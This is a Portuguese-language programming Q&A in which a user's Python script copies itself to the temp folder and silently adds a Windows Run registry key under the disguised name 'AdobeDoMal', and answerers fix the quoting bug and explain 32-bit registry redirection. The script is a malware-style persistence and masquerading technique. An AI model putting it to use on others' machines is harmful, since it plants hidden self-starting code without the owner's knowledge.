# Alterando chave no registro do Windows 10

Tags: python, windows

O código abaixo está dando "Erro no registro", ou seja, não cria a chave no registro do Windows. Alguém tem ideia de como resolver?

```
import socket
import time
import subprocess #Executar comandos do SO
import tempfile  #pegar o tmp do SO
import os #rodar comandos do SO

FILENAME ='ED5.py'
TMPDIR  = tempfile.gettempdir()        #varia de acordo com a versao do windows

def autorun():
    try:
        os.system("copy " + FILENAME + " " + TMPDIR)#se fosse linux, usaria cp em vez de copy
    except:
        print("Erro na copia")

    try:
        ####criar a chave de registro
        FNULL = open(os.devnull, 'w')
        subprocess.Popen("REG ADD HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
                         " /v AdobeDoMal /d " + TMPDIR + "\\" + FILENAME, stdout=FNULL, stderr=FNULL) #key para programas de 64 bits
    except:
        print("Erro no registro")

autorun()
```

Answer (score 4, accepted):

Tem duas aspas `"` a mais:

```
subprocess.Popen(
"REG ADD HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
                                                                      ----------^
" /v AdobeDoMal /d " + TEMPDIR + "\\" + FILENAME, stdout=FNULL, stderr=FNULL)
^---------
```

Deixe a linha acima assim:

```
subprocess.Popen(
"REG ADD HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ /v AdobeDoMal /d " + TMPDIR + "\\" + FILENAME, stdout=FNULL, stderr=FNULL)
```

Se você preferir formatar a *string*, use o [`str.format()`](https://docs.python.org/3.5/library/stdtypes.html#str.format):

```
import subprocess, tempfile

arquivo = "ED5.py"
tmpDir = tempfile.gettempdir()

programa = "AdobedoMal"
chave = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

linha = "REG ADD {0} /t REG_SZ /v {1} /d {2}\{3}".format(chave, programa, tmpDir, arquivo)

try:
    subprocess.Popen(linha, stdout=FNULL, stderr=FNULL)
except:
    print("Erro no registro")
```

Comment: tentei tirar  aspa a mais e deu erro de sintaxe:  +  " /v AdobeDoMal /d " + TEMPDIR + "\\" + FILENAME, stdout=FNULL, stderr=FNULL) #key para programas de 64 bits
NameError: global name 'TEMPDIR' is not defined

Comment: Achei o  string.format() um pouco confuso.

Comment: O format é a maneira mais correta @EdS, até pode tirar os numeros e ficar só assim `{}`, mas certifique-se depois que respeitam a ordem das vars dentro do `format(...)`

Comment: @EdS Veja a mensagem: `NameError: global name 'TEMPDIR' is not defined` existe a variável `TEMPDIR`? o `string.format()` é bem mais prático, faça alguns testes!

Comment: @EdS Na verdade, eram duas aspas. :)

Comment: @zekk obrigado. Não conhecia o format. Vou estudá-lo. Agora descobri que meu código não funcionava porque TEMPDIR na verdade é TMPDIR...

Answer (score 0):

For me it worked like this:

```
subprocess.Popen(f"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ /v AdobeDoMal /d {tempdir}\\${filename}", stdout=fnull, stderr=fnull)
```

because the python is 32 bits it is automatically redirected to this path:

```
\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
```

Comment: @Solkarped Rejeitei sua edição porque todas as perguntas e respostas devem estar em português, então nesse caso entendo que uma edição só seria válida se fosse para no mínimo traduzir a pergunta.

Comment: @LuizAugusto O mesmo vale para você (ver meu comentário anterior acima). Arrumar somente a formatação dependendo do caso é desejável, mas nesse caso a resposta continuou em inglês, então no fim não foi uma edição muito boa (o ideal é que já corrigisse todos os problemas - nesse caso específico, traduzir para o português, por exemplo)

Comment: @hkotsubo certo! obrigado, dica anotada para as próximas revisões